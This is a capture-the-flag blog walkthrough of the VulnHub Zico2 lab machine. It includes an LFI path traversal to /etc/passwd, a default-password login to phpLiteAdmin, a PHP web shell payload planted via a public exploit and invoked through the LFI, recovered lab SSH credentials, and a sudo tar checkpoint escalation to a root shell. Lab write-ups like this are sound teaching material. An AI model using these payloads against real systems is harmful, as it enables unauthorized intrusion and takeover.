VulnHub Zico2: 1 Walkthrough

HacktheBox Querier: Walkthrough
June 22, 2019
HacktheBox Netmon: Walkthrough
June 29, 2019
Share This:

VulnHub Zico2: 1 Walkthrough

Nmap

I found that this target has only 3 open ports (22 SSH, 80 HTTP, and 111 RPC). I started with the HTTP port by browsing the website hosting on this web server.

Http – Port 80

I found view.php linked to home page.

Check them out Button is linked to /view.php?page=tools.html means maybe LFI will work

URL : /view.php?page=../../../../../etc/passwd

So far i got LFI i enumerated with it but got nothing interesting so i did dirb

In dbadmin folder phpliteadmin v1.9.3 is running

I logged in by guessing default password : admin

Searching for exploit

Exploit Link : https://www.exploit-db.com/exploits/24044

using this exploit i successfully exploited phpliteadmin to get a shell

Exploiting phpliteadmin

According to exploit: Steps :

  1. Create new database named “hack.php”
  2. Now create a new table in this database and insert a text field with the default value: “<?php echo system($_GET[“cmd”]); ?>”

phpliteadmin is reveling the full path of php script.

Default Value : ” <?php echo system($_GET[“cmd”]); ?>”

Now to call the shell, Remember the LFI found. shell can be easily called from there

URL : view.php?page=../../usr/databases/hack.php&cmd=id

Using this LFI i found “zico” user’s home directory in which there is wordpress directory contains the username and password which can be used to connect to ssh

Username : zico
Password : sWfCsfJSPV9H3AmQzw8

Privilege Escalation (tar)

i can run tar and zip command as a root without any password.

Using tar to escalate privileges

Command : sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Reading the root flag

Share This:

Leave a Reply

Your email address will not be published. Required fields are marked *

%d bloggers like this: